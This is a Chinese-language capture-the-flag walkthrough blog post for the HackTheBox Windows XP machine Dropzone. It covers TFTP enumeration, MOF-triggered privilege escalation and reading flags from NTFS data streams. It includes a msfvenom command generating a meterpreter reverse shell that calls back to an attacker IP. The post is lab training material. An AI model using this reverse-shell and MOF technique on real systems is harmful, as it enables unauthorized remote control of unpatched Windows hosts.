No.73-HackTheBox-windows-Dropzone-Walkthrough渗透学习

**

HackTheBox-windows-Dropzone-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/139
靶机难度:中级(5.0/10)
靶机发布日期:2018年11月4日
靶机描述:
Dropzone is an interesting machine that highlights a technique used by the Stuxnet worm. The discovery of NTFS data streams provides an additional challenge.
作者:大余
时间:2020-03-22
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.90…
在这里插入图片描述
可以看到,不存在TCP服务…看看UDP
在这里插入图片描述
nmap发现了69的tftp服务开放着…
在这里插入图片描述
竟然只开放了tftp服务,这里可以进行查询命令帮助…开始找问题收集信息…
在这里插入图片描述
这里尝试下载,发现权限是开放着,是名称打错的原因?试试…
在这里插入图片描述
直接尝试下载boot.ini这是windows系统运行参数的文件…可以看到这是windows xp系统…
XP系统,这里可以开始提权了…GO

二、提权

方法1:

这里利用MSF进行提权…
在这里插入图片描述
命令:git clone https://github.com/Sayantan5/Dropzone
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.11 lport=443 -f exe > dayu.exe
这里利用msfvenom生成.exe的shellcode…然后利用hack.mof触发shellcode…这里.mof是某位大神利用wbemexec.rb编码写的…
在这里插入图片描述
前提要将Mode模式转换成octet…
然后上传dayu.exe,成功上传…
在这里插入图片描述
可以看到直接提权成功…这是5.0的分值的靶机…这么容易?????
在这里插入图片描述
我觉得没这么容易,不给下载…进去看看…
在这里插入图片描述
果然…It’s easy, but not THAT easy…
在这里插入图片描述
这里真的恶心…10~1分钟不等之间会自动退出shell…不稳定…
还好我用了MSF进行监听…
这里可以发现一个flags下的.txt文本…
在这里插入图片描述
再次尝试查看,制动关闭的shellcode…
在这里插入图片描述
这里需要利用Streams查看数据信息流…
在这里插入图片描述
利用tftp上传…我快吐了…HTBwindows服务器最近很卡很卡…可以看到我上传了527秒…
等了这么久我竟然没想到利用smbserver开启smb共享,然后在靶机里\10.10.14.11…下载streams.exe…可能太累了…
成功读取数据流获得了root/user信息…

太卡了,可能是HTB的windows服务器问题,也有人反馈了说很卡…
还有就是只开放一个端口,有时候会有别的玩家进来和我在同一个屋檐下…不冲突都难…

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

原创文章 102 获赞 13 访问量 2万+

猜你喜欢

转载自blog.csdn.net/qq_34801745/article/details/105030067